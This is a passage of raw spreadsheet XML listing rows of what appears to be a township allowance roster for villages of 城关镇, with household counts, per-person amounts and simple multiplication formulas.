      <c r="H96" s="18">
        <v>365</v>
      </c>
      <c r="I96" s="17">
        <f>H96*G96</f>
        <v>365</v>
      </c>
      <c r="J96" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K96" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="97" customHeight="1" spans="1:11">
      <c r="A97" s="16" t="s">
        <v>479</v>
      </c>
      <c r="B97" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C97" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D97" s="17" t="s">
        <v>480</v>
      </c>
      <c r="E97" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F97" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G97" s="17">
        <v>2</v>
      </c>
      <c r="H97" s="18">
        <v>325</v>
      </c>
      <c r="I97" s="17">
        <f>H97*G97</f>
        <v>650</v>
      </c>
      <c r="J97" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K97" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="98" customHeight="1" spans="1:11">
      <c r="A98" s="16" t="s">
        <v>482</v>
      </c>
      <c r="B98" s="17" t="str">
        <f>B97</f>
        <v>城关镇</v>
      </c>
      <c r="C98" s="17" t="str">
        <f>C97</f>
        <v>北外村</v>
      </c>
      <c r="D98" s="16" t="s">
        <v>483</v>
      </c>
      <c r="E98" s="16" t="s">
        <v>303</v>
      </c>
      <c r="F98" s="17" t="str">
        <f>F97</f>
        <v>4113210102</v>
      </c>
      <c r="G98" s="17"/>
      <c r="H98" s="17"/>
      <c r="I98" s="17"/>
      <c r="J98" s="17"/>
      <c r="K98" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="99" customHeight="1" spans="1:11">
      <c r="A99" s="16" t="s">
        <v>484</v>
      </c>
      <c r="B99" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C99" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D99" s="17" t="s">
        <v>485</v>
      </c>
      <c r="E99" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F99" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G99" s="17">
        <v>2</v>
      </c>
      <c r="H99" s="18">
        <v>325</v>
      </c>
      <c r="I99" s="17">
        <f>H99*G99</f>
        <v>650</v>
      </c>
      <c r="J99" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K99" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="100" customHeight="1" spans="1:11">
      <c r="A100" s="16" t="s">
        <v>486</v>
      </c>
      <c r="B100" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C100" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D100" s="16" t="s">
        <v>487</v>
      </c>
      <c r="E100" s="16" t="s">
        <v>488</v>
      </c>
      <c r="F100" s="17" t="str">
        <f>F99</f>
        <v>4113210106</v>
      </c>
      <c r="G100" s="17"/>
      <c r="H100" s="17"/>
      <c r="I100" s="17"/>
      <c r="J100" s="17"/>
      <c r="K100" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="101" customHeight="1" spans="1:11">
      <c r="A101" s="16" t="s">
        <v>489</v>
      </c>
      <c r="B101" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C101" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D101" s="17" t="s">
        <v>490</v>
      </c>
      <c r="E101" s="17" t="s">
        <v>346</v>
      </c>
      <c r="F101" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G101" s="17">
        <v>1</v>
      </c>
      <c r="H101" s="18">
        <v>365</v>
      </c>
      <c r="I101" s="17">
        <f t="shared" ref="I101:I107" si="3">H101*G101</f>
        <v>365</v>
      </c>
      <c r="J101" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K101" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="102" customHeight="1" spans="1:11">
      <c r="A102" s="16" t="s">
        <v>491</v>
      </c>
      <c r="B102" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C102" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D102" s="17" t="s">
        <v>492</v>
      </c>
      <c r="E102" s="17" t="s">
        <v>493</v>
      </c>
      <c r="F102" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G102" s="17">
        <v>1</v>
      </c>
      <c r="H102" s="18">
        <v>365</v>
      </c>
      <c r="I102" s="17">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J102" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K102" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="103" customHeight="1" spans="1:11">
      <c r="A103" s="16" t="s">
        <v>494</v>
      </c>
      <c r="B103" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C103" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D103" s="17" t="s">
        <v>495</v>
      </c>
      <c r="E103" s="17" t="s">
        <v>496</v>
      </c>
      <c r="F103" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G103" s="17">
        <v>1</v>
      </c>
      <c r="H103" s="18">
        <v>365</v>
      </c>
      <c r="I103" s="17">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J103" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K103" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="104" customHeight="1" spans="1:11">
      <c r="A104" s="16" t="s">
        <v>497</v>
      </c>
      <c r="B104" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C104" s="17" t="s">
        <v>247</v>
      </c>
      <c r="D104" s="17" t="s">
        <v>498</v>
      </c>
      <c r="E104" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F104" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G104" s="17">
        <v>1</v>
      </c>
      <c r="H104" s="18">
        <v>365</v>
      </c>
      <c r="I104" s="17">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J104" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K104" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="105" customHeight="1" spans="1:11">
      <c r="A105" s="16" t="s">
        <v>500</v>
      </c>
      <c r="B105" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C105" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D105" s="17" t="s">
        <v>501</v>
      </c>
      <c r="E105" s="17" t="s">
        <v>502</v>
      </c>
      <c r="F105" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G105" s="17">
        <v>1</v>
      </c>
      <c r="H105" s="18">
        <v>365</v>
      </c>
      <c r="I105" s="17">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J105" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K105" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="106" customHeight="1" spans="1:11">
      <c r="A106" s="16" t="s">
        <v>503</v>
      </c>
      <c r="B106" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C106" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D106" s="17" t="s">
        <v>504</v>
      </c>
      <c r="E106" s="17" t="s">
        <v>505</v>
      </c>
      <c r="F106" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G106" s="17">
        <v>1</v>
      </c>
      <c r="H106" s="18">
        <v>365</v>
      </c>
      <c r="I106" s="17">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J106" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K106" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="107" customHeight="1" spans="1:11">
      <c r="A107" s="16" t="s">
        <v>506</v>
      </c>
      <c r="B107" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C107" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D107" s="17" t="s">
        <v>507</v>
      </c>
      <c r="E107" s="17" t="s">
        <v>508</v>
      </c>
      <c r="F107" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G107" s="17">
        <v>2</v>
      </c>
      <c r="H107" s="18">
        <v>325</v>
      </c>
      <c r="I107" s="17">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J107" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K107" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="108" customHeight="1" spans="1:11">
      <c r="A108" s="16" t="s">
        <v>509</v>
      </c>
      <c r="B108" s="17" t="str">
        <f>B107</f>
        <v>城关镇</v>
      </c>
      <c r="C108" s="17" t="str">
        <f>C107</f>
        <v>中华村</v>
      </c>
      <c r="D108" s="16" t="s">
        <v>510</v>
      </c>
      <c r="E108" s="16" t="s">
        <v>511</v>
      </c>
      <c r="F108" s="17" t="str">
        <f>F107</f>
        <v>4113210108</v>
      </c>
      <c r="G108" s="17"/>
      <c r="H108" s="17"/>
      <c r="I108" s="17"/>
      <c r="J108" s="17"/>
      <c r="K108" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="109" customHeight="1" spans="1:11">
      <c r="A109" s="16" t="s">
        <v>512</v>
      </c>
      <c r="B109" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C109" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D109" s="17" t="s">
        <v>513</v>
      </c>
      <c r="E109" s="17" t="s">
        <v>514</v>
      </c>
      <c r="F109" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G109" s="17">
        <v>2</v>
      </c>
      <c r="H109" s="18">
        <v>325</v>
      </c>
      <c r="I109" s="17">
        <f>H109*G109</f>
        <v>650</v>
      </c>
      <c r="J109" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K109" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="110" customHeight="1" spans="1:11">
      <c r="A110" s="16" t="s">
        <v>515</v>
      </c>
      <c r="B110" s="17" t="str">
        <f>B109</f>
        <v>城关镇</v>
      </c>
      <c r="C110" s="17" t="str">
        <f>C109</f>
        <v>北外村</v>
      </c>
      <c r="D110" s="20" t="s">
        <v>516</v>
      </c>
      <c r="E110" s="20" t="s">
        <v>269</v>
      </c>
      <c r="F110" s="17" t="str">
        <f>F109</f>
        <v>4113210102</v>
      </c>
      <c r="G110" s="17"/>
      <c r="H110" s="17"/>
      <c r="I110" s="17"/>
      <c r="J110" s="17"/>
      <c r="K110" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="111" customHeight="1" spans="1:11">
      <c r="A111" s="16" t="s">
        <v>517</v>
      </c>
      <c r="B111" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C111" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D111" s="17" t="s">
        <v>518</v>
      </c>
      <c r="E111" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F111" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G111" s="17">
        <v>1</v>
      </c>
      <c r="H111" s="18">
        <v>365</v>
      </c>
      <c r="I111" s="17">
        <f>H111*G111</f>
        <v>365</v>
      </c>
      <c r="J111" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K111" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="112" customHeight="1" spans="1:11">
      <c r="A112" s="16" t="s">
        <v>519</v>
      </c>
      <c r="B112" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C112" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D112" s="17" t="s">
        <v>520</v>
      </c>
      <c r="E112" s="17" t="s">
        <v>521</v>
      </c>
      <c r="F112" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G112" s="17">
        <v>2</v>
      </c>
      <c r="H112" s="18">
        <v>325</v>
      </c>
      <c r="I112" s="17">
        <f>H112*G112</f>
        <v>650</v>
      </c>
      <c r="J112" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K112" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="113" customHeight="1" spans="1:11">
      <c r="A113" s="16" t="s">
        <v>522</v>
      </c>
      <c r="B113" s="17" t="str">
        <f>B112</f>
        <v>城关镇</v>
      </c>
      <c r="C113" s="17" t="str">
        <f>C112</f>
        <v>中华村</v>
      </c>
      <c r="D113" s="16" t="s">
        <v>523</v>
      </c>
      <c r="E113" s="16" t="s">
        <v>312</v>
      </c>
      <c r="F113" s="17" t="str">
        <f>F112</f>
        <v>4113210108</v>
      </c>
      <c r="G113" s="17"/>
      <c r="H113" s="17"/>
      <c r="I113" s="17"/>
      <c r="J113" s="17"/>
      <c r="K113" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="114" customHeight="1" spans="1:11">
      <c r="A114" s="16" t="s">
        <v>524</v>
      </c>
      <c r="B114" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C114" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D114" s="17" t="s">
        <v>525</v>
      </c>
      <c r="E114" s="17" t="s">
        <v>526</v>
      </c>
      <c r="F114" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G114" s="17">
        <v>1</v>
      </c>
      <c r="H114" s="18">
        <v>365</v>
      </c>
      <c r="I114" s="17">
        <f>H114*G114</f>
        <v>365</v>
      </c>
      <c r="J114" s="17" t="s">
        <v>527</v>
      </c>
      <c r="K114" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="115" customHeight="1" spans="1:11">
      <c r="A115" s="16" t="s">
        <v>528</v>
      </c>
      <c r="B115" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C115" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D115" s="17" t="s">
        <v>529</v>
      </c>
      <c r="E115" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F115" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G115" s="17">
        <v>2</v>
      </c>
      <c r="H115" s="18">
        <v>325</v>
      </c>
      <c r="I115" s="17">
        <f>H115*G115</f>
        <v>650</v>
      </c>
      <c r="J115" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K115" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="116" customHeight="1" spans="1:11">
      <c r="A116" s="16" t="s">
        <v>530</v>
      </c>
      <c r="B116" s="17" t="str">
        <f>B115</f>
        <v>城关镇</v>
      </c>
      <c r="C116" s="17" t="str">
        <f>C115</f>
        <v>中华村</v>
      </c>
      <c r="D116" s="16" t="s">
        <v>531</v>
      </c>
      <c r="E116" s="16" t="s">
        <v>249</v>
      </c>
      <c r="F116" s="17" t="str">
        <f>F115</f>
        <v>4113210108</v>
      </c>
      <c r="G116" s="17"/>
      <c r="H116" s="17"/>
      <c r="I116" s="17"/>
      <c r="J116" s="17"/>
      <c r="K116" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="117" customHeight="1" spans="1:11">
      <c r="A117" s="16" t="s">
        <v>532</v>
      </c>
      <c r="B117" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C117" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D117" s="17" t="s">
        <v>533</v>
      </c>
      <c r="E117" s="17" t="s">
        <v>258</v>
      </c>
      <c r="F117" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G117" s="17">
        <v>2</v>
      </c>
      <c r="H117" s="18">
        <v>325</v>
      </c>
      <c r="I117" s="17">
        <f>H117*G117</f>
        <v>650</v>
      </c>
      <c r="J117" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K117" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="118" customHeight="1" spans="1:11">
      <c r="A118" s="16" t="s">
        <v>534</v>
      </c>
      <c r="B118" s="17" t="str">
        <f>B117</f>
        <v>城关镇</v>
      </c>
      <c r="C118" s="17" t="str">
        <f>C117</f>
        <v>西北村</v>
      </c>
      <c r="D118" s="16" t="s">
        <v>535</v>
      </c>
      <c r="E118" s="16" t="s">
        <v>303</v>
      </c>
      <c r="F118" s="17" t="str">
        <f>F117</f>
        <v>4113210106</v>
      </c>
      <c r="G118" s="17"/>
      <c r="H118" s="17"/>
      <c r="I118" s="17"/>
      <c r="J118" s="17"/>
      <c r="K118" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="119" customHeight="1" spans="1:11">
      <c r="A119" s="16" t="s">
        <v>536</v>
      </c>
      <c r="B119" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C119" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D119" s="17" t="s">
        <v>537</v>
      </c>
      <c r="E119" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F119" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G119" s="17">
        <v>1</v>
      </c>
      <c r="H119" s="18">
        <v>365</v>
      </c>
      <c r="I119" s="17">
        <f>H119*G119</f>
        <v>365</v>
      </c>
      <c r="J119" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K119" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="120" customHeight="1" spans="1:11">
      <c r="A120" s="16" t="s">
        <v>538</v>
      </c>
      <c r="B120" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C120" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D120" s="17" t="s">
        <v>539</v>
      </c>
      <c r="E120" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F120" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G120" s="17">
        <v>3</v>
      </c>
      <c r="H120" s="18">
        <v>290</v>
      </c>
      <c r="I120" s="17">
        <f>H120*G120</f>
        <v>870</v>
      </c>
      <c r="J120" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K120" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="121" customHeight="1" spans="1:11">
      <c r="A121" s="16" t="s">
        <v>540</v>
      </c>
      <c r="B121" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C121" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D121" s="16" t="s">
        <v>541</v>
      </c>
      <c r="E121" s="16" t="s">
        <v>542</v>
      </c>
      <c r="F121" s="17" t="str">
        <f>F120</f>
        <v>4113210106</v>
      </c>
      <c r="G121" s="17"/>
      <c r="H121" s="17"/>
      <c r="I121" s="17"/>
      <c r="J121" s="17"/>
      <c r="K121" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="122" customHeight="1" spans="1:11">
      <c r="A122" s="16" t="s">
        <v>543</v>
      </c>
      <c r="B122" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C122" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D122" s="16" t="s">
        <v>544</v>
      </c>
      <c r="E122" s="16" t="s">
        <v>545</v>
      </c>
      <c r="F122" s="17" t="str">
        <f>F121</f>
        <v>4113210106</v>
      </c>
      <c r="G122" s="17"/>
      <c r="H122" s="17"/>
      <c r="I122" s="17"/>
      <c r="J122" s="17"/>
      <c r="K122" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="123" customHeight="1" spans="1:11">
      <c r="A123" s="16" t="s">
        <v>546</v>
      </c>
      <c r="B123" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C123" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D123" s="17" t="s">
        <v>547</v>
      </c>
      <c r="E123" s="17" t="s">
        <v>402</v>
      </c>
      <c r="F123" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G123" s="17">
        <v>1</v>
      </c>
      <c r="H123" s="18">
        <v>365</v>
      </c>
      <c r="I123" s="17">
        <f t="shared" ref="I123:I128" si="4">H123*G123</f>
        <v>365</v>
      </c>
      <c r="J123" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K123" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="124" customHeight="1" spans="1:11">
      <c r="A124" s="16" t="s">
        <v>548</v>
      </c>
      <c r="B124" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C124" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D124" s="17" t="s">
        <v>549</v>
      </c>
      <c r="E124" s="17" t="s">
        <v>542</v>
      </c>
      <c r="F124" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G124" s="17">
        <v>1</v>
      </c>
      <c r="H124" s="18">
        <v>365</v>
      </c>
      <c r="I124" s="17">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J124" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K124" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="125" customHeight="1" spans="1:11">
      <c r="A125" s="16" t="s">
        <v>550</v>
      </c>
      <c r="B125" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C125" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D125" s="17" t="s">
        <v>551</v>
      </c>
      <c r="E125" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F125" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G125" s="17">
        <v>1</v>
      </c>
      <c r="H125" s="18">
        <v>365</v>
      </c>
      <c r="I125" s="17">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J125" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K125" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="126" customHeight="1" spans="1:11">
      <c r="A126" s="16" t="s">
        <v>552</v>
      </c>
      <c r="B126" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C126" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D126" s="17" t="s">
        <v>553</v>
      </c>
      <c r="E126" s="17" t="s">
        <v>554</v>
      </c>
      <c r="F126" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G126" s="17">
        <v>1</v>
      </c>
      <c r="H126" s="18">
        <v>365</v>
      </c>
      <c r="I126" s="17">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J126" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K126" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="127" customHeight="1" spans="1:11">
      <c r="A127" s="16" t="s">
        <v>555</v>
      </c>
      <c r="B127" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C127" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D127" s="17" t="s">
        <v>556</v>
      </c>
      <c r="E127" s="17" t="s">
        <v>349</v>
      </c>
      <c r="F127" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G127" s="17">
        <v>1</v>
      </c>
      <c r="H127" s="18">
        <v>365</v>
      </c>
      <c r="I127" s="17">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J127" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K127" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="128" customHeight="1" spans="1:11">
      <c r="A128" s="16" t="s">
        <v>557</v>
      </c>
      <c r="B128" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C128" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D128" s="17" t="s">
        <v>558</v>
      </c>
      <c r="E128" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F128" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G128" s="17">
        <v>2</v>
      </c>
      <c r="H128" s="18">
        <v>325</v>
      </c>
      <c r="I128" s="17">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J128" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K128" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="129" customHeight="1" spans="1:22">
      <c r="A129" s="16" t="s">
        <v>559</v>
      </c>
      <c r="B129" s="17" t="str">
        <f>B128</f>
        <v>城关镇</v>
      </c>
      <c r="C129" s="17" t="str">
        <f>C128</f>
        <v>西北村</v>
      </c>
      <c r="D129" s="16" t="s">
        <v>560</v>
      </c>
      <c r="E129" s="16" t="s">
        <v>236</v>
      </c>
      <c r="F129" s="17" t="str">
        <f>F128</f>
        <v>4113210106</v>
      </c>
      <c r="G129" s="17"/>
      <c r="H129" s="17"/>
      <c r="I129" s="17"/>
      <c r="J129" s="17"/>
      <c r="K129" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="130" customHeight="1" spans="1:22">
      <c r="A130" s="16" t="s">
        <v>561</v>
      </c>
      <c r="B130" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C130" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D130" s="17" t="s">
        <v>562</v>
      </c>
      <c r="E130" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F130" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G130" s="17">
        <v>2</v>
      </c>
      <c r="H130" s="18">
        <v>325</v>
      </c>
      <c r="I130" s="17">
        <f>H130*G130</f>
        <v>650</v>
      </c>
      <c r="J130" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K130" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="131" customHeight="1" spans="1:22">
      <c r="A131" s="16" t="s">
        <v>564</v>
      </c>
      <c r="B131" s="17" t="str">
        <f>B130</f>
        <v>城关镇</v>
      </c>
      <c r="C131" s="17" t="str">
        <f>C130</f>
        <v>西北村</v>
      </c>
      <c r="D131" s="16" t="s">
        <v>565</v>
      </c>
      <c r="E131" s="16" t="s">
        <v>320</v>
      </c>
      <c r="F131" s="17" t="str">
        <f>F130</f>
        <v>4113210106</v>
      </c>
      <c r="G131" s="17"/>
      <c r="H131" s="17"/>
      <c r="I131" s="17"/>
      <c r="J131" s="17"/>
      <c r="K131" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="132" customHeight="1" spans="1:22">
      <c r="A132" s="16" t="s">
        <v>566</v>
      </c>
      <c r="B132" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C132" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D132" s="17" t="s">
        <v>567</v>
      </c>
      <c r="E132" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F132" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G132" s="17">
        <v>1</v>
      </c>
      <c r="H132" s="18">
        <v>365</v>
      </c>
      <c r="I132" s="17">
        <f>H132*G132</f>
        <v>365</v>
      </c>
      <c r="J132" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K132" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="133" customHeight="1" spans="1:22">
      <c r="A133" s="16" t="s">
        <v>568</v>
      </c>
      <c r="B133" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C133" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D133" s="17" t="s">
        <v>569</v>
      </c>
      <c r="E133" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F133" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G133" s="17">
        <v>2</v>
      </c>
      <c r="H133" s="18">
        <v>325</v>
      </c>
      <c r="I133" s="17">
        <f>H133*G133</f>
        <v>650</v>
      </c>
      <c r="J133" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K133" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="134" customHeight="1" spans="1:22">
      <c r="A134" s="16" t="s">
        <v>570</v>
      </c>
      <c r="B134" s="17" t="str">
        <f>B133</f>
        <v>城关镇</v>
      </c>
      <c r="C134" s="17" t="str">
        <f>C133</f>
        <v>北外村</v>
      </c>
      <c r="D134" s="16" t="s">
        <v>571</v>
      </c>
      <c r="E134" s="16" t="s">
        <v>273</v>
      </c>
      <c r="F134" s="17" t="str">
        <f>F133</f>
        <v>4113210102</v>
      </c>
      <c r="G134" s="17"/>
      <c r="H134" s="17"/>
      <c r="I134" s="17"/>
      <c r="J134" s="17"/>
      <c r="K134" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="135" customHeight="1" spans="1:22">
      <c r="A135" s="16" t="s">
        <v>572</v>
      </c>
      <c r="B135" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C135" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D135" s="17" t="s">
        <v>573</v>
      </c>
      <c r="E135" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F135" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G135" s="17">
        <v>2</v>
      </c>
      <c r="H135" s="18">
        <v>325</v>
      </c>
      <c r="I135" s="17">
        <f>H135*G135</f>
        <v>650</v>
      </c>
      <c r="J135" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K135" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="136" customHeight="1" spans="1:22">
      <c r="A136" s="16" t="s">
        <v>574</v>
      </c>
      <c r="B136" s="17" t="str">
        <f>B135</f>
        <v>城关镇</v>
      </c>
      <c r="C136" s="17" t="str">
        <f>C135</f>
        <v>东北六组</v>
      </c>
      <c r="D136" s="16" t="s">
        <v>575</v>
      </c>
      <c r="E136" s="16" t="s">
        <v>320</v>
      </c>
      <c r="F136" s="17" t="str">
        <f>F135</f>
        <v>4113210103</v>
      </c>
      <c r="G136" s="17"/>
      <c r="H136" s="17"/>
      <c r="I136" s="17"/>
      <c r="J136" s="17"/>
      <c r="K136" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="137" customHeight="1" spans="1:22">
      <c r="A137" s="16" t="s">
        <v>576</v>
      </c>
      <c r="B137" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C137" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D137" s="17" t="s">
        <v>577</v>
      </c>
      <c r="E137" s="17" t="s">
        <v>578</v>
      </c>
      <c r="F137" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G137" s="17">
        <v>1</v>
      </c>
      <c r="H137" s="18">
        <v>365</v>
      </c>
      <c r="I137" s="17">
        <f>H137*G137</f>
        <v>365</v>
      </c>
      <c r="J137" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K137" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="138" customHeight="1" spans="1:22">
      <c r="A138" s="16" t="s">
        <v>579</v>
      </c>
      <c r="B138" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C138" s="17" t="s">
